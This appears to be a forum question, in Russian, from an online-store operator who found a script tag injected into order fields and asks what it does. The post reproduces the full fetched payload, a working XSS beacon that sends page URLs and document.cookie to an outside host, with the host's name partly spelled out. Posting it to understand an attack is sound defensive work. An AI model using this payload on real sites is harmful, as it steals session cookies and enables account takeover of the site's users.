Injection Script, что он делает?

Question

Injection Script, что он делает?

Работая с интернет-магазином на одной из популярных платформ, получил заказ со следующим сценарием, встроенным в несколько полей: имя, адрес и т. Д. Я пытаюсь понять, что выполняет сценарий. Я удалил любой способ для запуска на этой странице, я надеюсь:

[script src=//XX.YY/g][/script]

btw, XX=jb & YY=gy

==>>

(function(){(new Image()).src='http://XX.YY/index.php?do=api&id=g&location='+escape((function(){try{return document.location.href}catch(e){return ''}})())+'&toplocation='+escape((function(){try{return top.location.href}catch(e){return ''}})())+'&cookie='+escape((function(){try{return document.cookie}catch(e){return ''}})())+'&opener='+escape((function(){try{return (window.opener && window.opener.location.href)?window.opener.location.href:''}catch(e){return ''}})());})();
if('1'==1){keep=new Image();keep.src='http://XX.YY/index.php?do=keepsession&id=g&url='+escape(document.location)+'&cookie='+escape(document.cookie)};
x=new Image();
x.src="http://XX.YY/authtest.php?id=g&info=cheeptrims.com";

2

code-injection client-side-attacks

Источник

user9597164 04 апр '18 в 14:00

0 ответов

Другие вопросы по тегам code-injection client-side-attacks